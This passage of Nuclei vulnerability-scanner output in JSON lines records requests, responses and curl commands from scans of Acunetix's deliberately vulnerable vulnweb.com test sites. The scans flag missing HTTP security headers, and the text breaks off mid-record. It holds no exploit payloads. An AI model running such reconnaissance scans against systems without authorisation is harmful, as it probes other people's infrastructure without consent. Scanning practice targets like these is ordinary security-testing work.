id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:09.856404487Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:10.347860812Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not 